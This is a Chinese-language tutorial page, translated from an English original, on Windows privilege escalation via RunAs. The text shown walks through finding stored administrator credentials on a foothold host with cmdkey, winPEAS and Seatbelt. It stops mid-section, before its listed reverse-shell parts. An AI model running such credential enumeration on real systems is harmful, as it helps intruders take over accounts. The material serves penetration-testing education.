<!doctype html>
<html lang="zh" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-渗透/Windows 提权/Windows 提权-RunAs" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.7.0">
<title data-rh="true">Windows 提权-RunAs | 扛枪的书生</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://kqdssheng.github.io/web/img/docusaurus-social-card.jpg"><meta data-rh="true" name="twitter:image" content="https://kqdssheng.github.io/web/img/docusaurus-social-card.jpg"><meta data-rh="true" property="og:url" content="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-RunAs"><meta data-rh="true" property="og:locale" content="zh"><meta data-rh="true" name="docusaurus_locale" content="zh"><meta data-rh="true" name="docsearch:language" content="zh"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Windows 提权-RunAs | 扛枪的书生"><meta data-rh="true" name="description" content="本文通过 Google 翻译 RunAs – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><meta data-rh="true" property="og:description" content="本文通过 Google 翻译 RunAs – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><link data-rh="true" rel="icon" href="/web/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-RunAs"><link data-rh="true" rel="alternate" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-RunAs" hreflang="zh"><link data-rh="true" rel="alternate" href="https://kqdssheng.github.io/web/docs/渗透/Windows 提权/Windows 提权-RunAs" hreflang="x-default"><link rel="alternate" type="application/rss+xml" href="/web/blog/rss.xml" title="扛枪的书生 RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/web/blog/atom.xml" title="扛枪的书生 Atom Feed"><link rel="stylesheet" href="/web/assets/css/styles.b7abb307.css">
<script src="/web/assets/js/runtime~main.53f73fdc.js" defer="defer"></script>
<script src="/web/assets/js/main.fc57339d.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><link rel="preload" as="image" href="/web/img/logo.svg"><div role="region" aria-label="跳到主要内容"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">跳到主要内容</a></div><nav aria-label="主导航" class="navbar navbar--fixed-top navbarHideable_m1mJ navbar--primary"><div class="navbar__inner"><div class="navbar__items"><button aria-label="切换导航栏" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/web/"><div class="navbar__logo"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/web/docs/category/️渗透">文章</a><a class="navbar__item navbar__link" href="/web/blog">说说</a><div class="navbar__item dropdown dropdown--hoverable"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">其它</a><ul class="dropdown__menu"><li><a href="https://www.douban.com/doulist/154252035/" target="_blank" rel="noopener noreferrer" class="dropdown__link">豆瓣<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://www.zhihu.com/people/KqdsshenG" target="_blank" rel="noopener noreferrer" class="dropdown__link">知乎<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://www.cnblogs.com/kqdssheng" target="_blank" rel="noopener noreferrer" class="dropdown__link">博客园<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://github.com/kqdssheng" target="_blank" rel="noopener noreferrer" class="dropdown__link">GitHub<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div></div><div class="navbar__items navbar__items--right"><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="切换浅色/暗黑模式（当前为浅色模式）" aria-label="切换浅色/暗黑模式（当前为浅色模式）" aria-live="polite" aria-pressed="false"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"><div class="navbar__search searchBarContainer_NW3z" dir="ltr"><input placeholder="搜索" aria-label="Search" class="navbar__search-input searchInput_YFbd" value=""><div class="loadingRing_RJI3 searchBarLoadingRing_YnHq"><div></div><div></div><div></div><div></div></div></div></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="回到顶部" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd sidebarWithHideableNavbar_wUlq"><a tabindex="-1" class="sidebarLogo_isFc" href="/web/"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/web/img/logo.svg" alt="kqdssheng" class="themedComponent_mlkZ themedComponent--dark_xIcU"></a><nav aria-label="文档侧边栏" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" href="/web/docs/category/️渗透">🕵️渗透</a><button aria-label="折叠侧边栏分类 &#x27;🕵️渗透&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" tabindex="0" href="/web/docs/category/linux-提权">Linux 提权</a><button aria-label="展开侧边栏分类 &#x27;Linux 提权&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" tabindex="0" href="/web/docs/category/windows-提权">Windows 提权</a><button aria-label="折叠侧边栏分类 &#x27;Windows 提权&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-MSSQL">Windows 提权-MSSQL</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-PrintNightmare">Windows 提权-PrintNightmare</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-RunAs">Windows 提权-RunAs</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-SeBackupPrivilege 特权">Windows 提权-SeBackupPrivilege 特权</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-SeImpersonatePrivilege 特权">Windows 提权-SeImpersonatePrivilege 特权</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-UAC 绕过">Windows 提权-UAC 绕过</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-不安全的 GUI 程序">Windows 提权-不安全的 GUI 程序</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-内核利用_1">Windows 提权-内核利用_1</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-内核利用_2">Windows 提权-内核利用_2</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-密码搜寻">Windows 提权-密码搜寻</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-手工枚举">Windows 提权-手工枚举</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_DLL 劫持">Windows 提权-服务_DLL 劫持</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱文件_目录权限">Windows 提权-服务_弱文件_目录权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱服务权限">Windows 提权-服务_弱服务权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_弱注册表权限">Windows 提权-服务_弱注册表权限</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/web/docs/渗透/Windows 提权/Windows 提权-服务_未引用的服务路径">Windows 提权-服务_未引用的服务路径</a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" tabindex="0" href="/web/docs/category/杂项">杂项</a><button aria-label="展开侧边栏分类 &#x27;杂项&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/linux">🐧Linux</a><button aria-label="展开侧边栏分类 &#x27;🐧Linux&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/windows">💻Windows</a><button aria-label="展开侧边栏分类 &#x27;💻Windows&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/杂项-1">📦杂项</a><button aria-label="展开侧边栏分类 &#x27;📦杂项&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/web/docs/category/gpt-问答">🤖GPT 问答</a><button aria-label="展开侧边栏分类 &#x27;🤖GPT 问答&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/web/docs/">🛠️软件百宝箱</a></li></ul></nav><button type="button" title="收起侧边栏" aria-label="收起侧边栏" class="button button--secondary button--outline collapseSidebarButton_PEFL"><svg width="20" height="20" aria-hidden="true" class="collapseSidebarButtonIcon_kv0_"><g fill="#7a7a7a"><path d="M9.992 10.023c0 .2-.062.399-.172.547l-4.996 7.492a.982.982 0 01-.828.454H1c-.55 0-1-.453-1-1 0-.2.059-.403.168-.551l4.629-6.942L.168 3.078A.939.939 0 010 2.528c0-.548.45-.997 1-.997h2.996c.352 0 .649.18.828.45L9.82 9.472c.11.148.172.347.172.55zm0 0"></path><path d="M19.98 10.023c0 .2-.058.399-.168.547l-4.996 7.492a.987.987 0 01-.828.454h-3c-.547 0-.996-.453-.996-1 0-.2.059-.403.168-.551l4.625-6.942-4.625-6.945a.939.939 0 01-.168-.55 1 1 0 01.996-.997h3c.348 0 .649.18.828.45l4.996 7.492c.11.148.168.347.168.55zm0 0"></path></g></svg></button></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="页面路径"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="主页面" class="breadcrumbs__link" href="/web/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item"><a class="breadcrumbs__link" itemprop="item" href="/web/docs/category/️渗透"><span itemprop="name">🕵️渗透</span></a><meta itemprop="position" content="1"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item"><a class="breadcrumbs__link" itemprop="item" href="/web/docs/category/windows-提权"><span itemprop="name">Windows 提权</span></a><meta itemprop="position" content="2"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">Windows 提权-RunAs</span><meta itemprop="position" content="3"></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">本页总览</button></div><div class="theme-doc-markdown markdown"><header><h1>Windows 提权-RunAs</h1></header><blockquote>
<p>本文通过 Google 翻译 <a href="https://juggernaut-sec.com/runas/" target="_blank" rel="noopener noreferrer">RunAs – Windows Privilege Escalation</a> 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。</p>
</blockquote>
<hr>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="导航">导航<a href="#导航" class="hash-link" aria-label="导航的直接链接" title="导航的直接链接">​</a></h2>
<ul>
<li><a href="#id0">0 前言</a></li>
<li><a href="#id1">1 通过存储的凭据进行 RunAs 提权</a>
<ul>
<li><a href="#id1.1">1.1 手动枚举存储的凭据</a></li>
<li><a href="#id1.2">1.2 工具枚举存储的凭据</a>
<ul>
<li><a href="#id1.2.1">1.2.1 WinPEAS – 失败！</a></li>
<li><a href="#id1.2.2">1.2.2 Seatbelt – 成功！</a></li>
</ul>
</li>
<li><a href="#id1.3">1.3 使用存储的凭证执行命令</a></li>
</ul>
</li>
<li><a href="#id2">2 通过提供的凭证进行 RunAs 提权</a>
<ul>
<li><a href="#id2.1">2.1 使用提供的凭证执行命令 – GUI</a></li>
<li><a href="#id2.2">2.2 使用提供的凭证执行命令 – Reverse Shell（普通用户）</a></li>
<li><a href="#id2.3">2.3 使用提供的凭证执行命令 – Reverse Shell（管理员用户）</a></li>
</ul>
</li>
</ul>
<hr>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="0前言"><strong><div id="id0">0、前言</div></strong><a href="#0前言" class="hash-link" aria-label="0前言的直接链接" title="0前言的直接链接">​</a></h2>
<p>在这篇文章中，让我们看看如何通过 RunAs 在 Windows 电脑上以其它用户的身份启动程序。我们将展示两种办法利用 RunAs：第一种办法是，根据存储在凭证管理器中的本地管理员凭据进行利用；第二种办法是，根据提供的一组用户凭证进行利用。</p>
<blockquote>
<p>注：RunAs 在此处代表一种功能，不是指 runas.exe 命令。runas.exe 命令只是实现 RunAs 功能的一个实例，而要实现此功能还可以有其它方式，如 PS 脚本、py 脚本等。</p>
</blockquote>
<blockquote>
<p>可以将 RunAs 看作是 Windows 中的 sudo，只不过它的表现并不如 sudo 在 Linux 中那样突出。</p>
</blockquote>
<p>有两种方式可以执行 RunAs：一种是在 cmd.exe 中使用 runas 命令（前提是：需要 <em>用户及密码</em> 或 <em>本地存储的凭据</em>。）；另一种是执行 PowerShell 版本的 RunAs（前提是：需要 <em>用户及密码</em>）。</p>
<blockquote>
<p>在此示例中，假设我们在 FTP 服务器中找到了敏感信息，然后以用户 efrost 的身份在 Windows 10 目标上获得了立足点。</p>
</blockquote>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183655295-681548961-2226aa60fffaf4e8e09b740f1c879927.png" width="500" height="179" class="img_ev3q"></p>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="1通过存储的凭据进行-runas-提权"><strong><div id="id1">1、通过存储的凭据进行 RunAs 提权</div></strong><a href="#1通过存储的凭据进行-runas-提权" class="hash-link" aria-label="1通过存储的凭据进行-runas-提权的直接链接" title="1通过存储的凭据进行-runas-提权的直接链接">​</a></h2>
<p>在目标主机上站稳脚跟之后，我们应该立即开始手动枚举，以便更好地了解当前的 shell 环境。搜索存储的凭证是首先要执行的手动命令之一，这一点很重要。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="11手动枚举存储的凭据"><strong><div id="id1.1">1.1、手动枚举存储的凭据</div></strong><a href="#11手动枚举存储的凭据" class="hash-link" aria-label="11手动枚举存储的凭据的直接链接" title="11手动枚举存储的凭据的直接链接">​</a></h4>
<p>使用以下命令来查找存储的凭证：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">cmdkey /list</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654739-1264959375-1e7d552d5b2daec697741cb103769bb2.png" width="435" height="307" class="img_ev3q"></p>
<p>在这里，可以看到本地管理员账户的凭据已存储在凭据管理器中，可以被用来执行命令。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="12工具枚举存储的凭据"><strong><div id="id1.2">1.2、工具枚举存储的凭据</div></strong><a href="#12工具枚举存储的凭据" class="hash-link" aria-label="12工具枚举存储的凭据的直接链接" title="12工具枚举存储的凭据的直接链接">​</a></h4>
<h6 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="121winpeas--失败"><strong><div id="id1.2.1">1.2.1、WinPEAS – 失败！</div></strong><a href="#121winpeas--失败" class="hash-link" aria-label="121winpeas--失败的直接链接" title="121winpeas--失败的直接链接">​</a></h6>
<p>市面上有很多后渗透枚举工具，很多都非常棒。但是，对于我们的需求来说，有 winPEAS.exe 基本就够了。</p>
<blockquote>
<p>如果您没有 winPEAS 的副本，可以在<a href="https://github.com/carlospolop/PEASS-ng" target="_blank" rel="noopener noreferrer">此处</a>获取。另外再推荐两个工具：<a href="https://github.com/r3motecontrol/Ghostpack-CompiledBinaries" target="_blank" rel="noopener noreferrer">Seatbelt.exe</a>、<a href="https://github.com/411Hall/JAWS" target="_blank" rel="noopener noreferrer">jaws-enum.ps1</a></p>
</blockquote>
<p>winPEAS 是顶级的枚举工具，能提供海量的信息，信息多到让人难以招架。但最关键的是，要懂得如何从海量信息中的什么地方去查找什么信息。</p>
<p>通常，我们会以不带任何参数的方式运行 winPEAS 以进行“所有检查”，然后再从上到下逐行梳理所有信息。</p>
<p>但在当前这种情况下，<strong>Windows Credentials</strong> 部分才是我们寻找存储凭据最关注的地方。考虑到这一点，我们可以使用 windowscreds 参数以将搜索范围缩小到仅进行 Windows 凭据的检查。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">.\winPEASx64.exe windowscreds</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250304183654044-1147207897-c6933b24185acaf0adcc6eb5158a2057.png" width="987" height="262" class="img_ev3q"></p>
<p>有趣的是，winPEAS 并没有找到什么！而这次经历也告诉我们，不应该过分依赖单一工具！</p>
<p>从输出中可以看到，winPEAS 使用的方法与我们手动枚举的方法相同。它提示我们在 winPEAS 失败后可以使用 cmdkey /list 来枚举此内容。</p>
<p>但是，我的确很想展示怎样通过工具来枚举存储的凭据，因此让我们来看一下 Seatbelt.exe 的表现吧。</p>
<h6 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="122seatbelt--成功"><strong><div id="id1.2.2">1.2.2、Seatbelt – 成功！</div></strong><a href="#122seatbelt--成功" class="hash-link" aria-label="122seatbelt--成功的直接链接" title="122seatbelt--成功的直接链接">​</a></h6>
<p>使用与 winPEAS.exe 非常相似的 Seatbelt.exe 工具，我们可以使用以下命令进行完全扫描（所有检查）：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">.\Seatbelt.exe -group=all -full</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>与 winPEAS 类似，我们也可以缩小 Seatbelt 的扫描范围。并且，扫描的范围能缩小到比 winPEAS 更精细的程度。使用 winPEAS 可以缩小到类别，但 Seatbelt 可以缩小到某个类别下面的各子项检查。</p>
<p>例如，如果仅仅只是要检查存储的凭证，则可以使用以下命令：</p>
